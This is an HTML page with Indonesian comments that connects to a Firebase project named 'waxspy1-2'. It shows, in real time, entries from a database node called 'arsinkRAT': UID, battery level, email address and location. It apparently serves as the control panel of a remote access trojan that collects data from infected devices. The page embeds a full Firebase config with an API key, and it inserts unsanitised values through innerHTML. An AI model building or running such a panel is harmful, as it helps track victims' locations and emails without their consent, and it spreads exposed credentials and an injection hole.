<!DOCTYPE html>
<html lang="id">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Data Real-time dari Firebase</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f0f0f0;
      margin: 0;
      padding: 20px;
    }

    #data-container {
      margin-top: 20px;
      background-color: #fff;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }

    .data-entry {
      margin-bottom: 15px;
      padding: 10px;
      border-bottom: 1px solid #ddd;
    }

    .data-entry:last-child {
      border-bottom: none;
    }
  </style>
</head>
<body>
  <h1>Data Real-time dari Firebase</h1>
  <div id="data-container">Memuat data...</div>

  <script src="https://www.gstatic.com/firebasejs/9.8.0/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/9.8.0/firebase-database.js"></script>
  <script>
    // Konfigurasi Firebase
    const firebaseConfig = {
      apiKey: "AIzaSyAzdGPaIxCO8VKwxB9H-SRUXLjs0lDjTXU",
      authDomain: "waxspy1-2.firebaseapp.com",
      databaseURL: "https://waxspy1-2-default-rtdb.firebaseio.com",
      projectId: "waxspy1-2",
      storageBucket: "waxspy1-2.appspot.com",
      messagingSenderId: "617524423546",
      appId: "1:617524423546:web:2abbc9335c09b31cd6c4c3",
      measurementId: "G-2HTGGDNDF3"
    };

    // Inisialisasi Firebase
    firebase.initializeApp(firebaseConfig);
    const database = firebase.database();

    // Elemen DOM
    const dataContainer = document.getElementById('data-container');

    // Fungsi untuk menampilkan data
    function displayData(dataKey, data) {
      const dataEntry = document.createElement('div');
      dataEntry.className = 'data-entry';
      dataEntry.innerHTML = `
        <strong>Key:</strong> ${dataKey} <br>
        <strong>UID:</strong> ${data.UID || 'N/A'} <br>
        <strong>Baterai:</strong> ${data.btr || 'N/A'} <br>
        <strong>Email:</strong> ${data.email || 'N/A'} <br>
        <strong>Lokasi:</strong> ${data.loc || 'N/A'} <br>
      `;
      dataContainer.appendChild(dataEntry);
    }

    // Menghapus pesan "Memuat data..." setelah data dimuat
    database.ref('arsinkRAT').once('value', (snapshot) => {
      if (snapshot.exists()) {
        dataContainer.innerHTML = '';  // Hapus pesan memuat jika data ada
      } else {
        dataContainer.innerHTML = 'Tidak ada data yang tersedia.';
      }
    });

    // Mendengarkan data baru di node arsinkRAT
    database.ref('arsinkRAT').on('child_added', (snapshot) => {
      const dataKey = snapshot.key;
      const data = snapshot.val();
      displayData(dataKey, data);
    });
  </script>
</body>
</html>